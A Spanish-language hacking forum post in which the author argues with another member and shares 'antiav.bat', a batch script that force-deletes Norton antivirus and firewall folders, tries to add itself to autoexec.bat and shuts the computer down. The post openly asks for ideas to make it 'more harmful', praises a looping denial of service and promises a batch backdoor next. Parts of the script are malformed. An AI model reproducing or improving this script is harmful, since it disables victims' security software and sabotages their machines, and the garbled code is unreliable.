dArK_gAp y tirher gracias por apollarme y sobre todo por no caer en la estupides de cerrarse a no ver lo que dije en un principio:
hola, weno que les parece? a alguien se le ocurre algo pa´ hacerlo más dañino o más gracioso?
saludos
tambien postee esto para que cambiaran el codigo y aportaran algo al hack asi que manibal creo que el que debe leer eres TU!
no nos insultes al desmerecernos, por mi parte no solo llevo unos meses en el underground soy todavia chavo y me falta mucho por aprender por el conocimiento nunca llega a su fin pero mi conocimiento lo he demostrado en mas de una ocación. Y no es que diga que sea un master hacker pero no soy lamer como piensas que soy:
esto tambien se podria usar como un ataque pero no he pensado mucho en eso.
con esto no quiere decir que no haya pensado en cosas maliciosas ¿pero que acaso no es de lamers pensar así??
luego escribes esta verdadera estupides:
SOSTENGO que practicamente no sirve poara nada... porque el ejemplo patetico del que habla dark_gap sirve solo para una maquina sin antivirus, sin firewall real. un rootkit o una backdoor pueden descargarse sin problemas...
jajajaja por eso este bello lenguaje nos da la solución:
**antiav.bat**
*---------------------------------------------*
@echo
cd
cd\
del /f /q /s C:\"Archivos de programas"\"Norton AntiVirus"
del /f /q /s C:\"Archivos de programas"\"Norton Persona Firewall"
cls
cd\antiav.bat>>autoexec.bat
shutdown /s /t /f /c "con esto se comprueba que la seguridad es matada por un simple bat"
*----------------------------------------------------*
lo del bucle con for como dije es buena idea y como dijiste crea un D.o.S. imaginense si x cada pantalla abierta nos mandara 5 centavos seraia genial! pero logico que no solo con un bat es ahí donde quise que propusieran ideas.
please dark_gap, habla solo de lo que sabes... e intenta mantener un hilo si?
es una pena...
dark_gap??? ? creo que TU nos das pena, alguien de mente tan cerrada (y no diras que como sabes si nio me conoces por que lo has demostrado).
creo que hay más personas como dArK_gAp y tirher que querran colaborar.
saludos
PD: tadavia me sigo riendo
SOSTENGO que practicamente no sirve poara nada... porque el ejemplo patetico del que habla dark_gap sirve solo para una maquina sin antivirus, sin firewall real. un rootkit o una backdoor pueden descargarse sin problemas...
jajajajajajajajajajajajajaja luego pongo un ejemplo de una backdoor con un bat para que me de más risa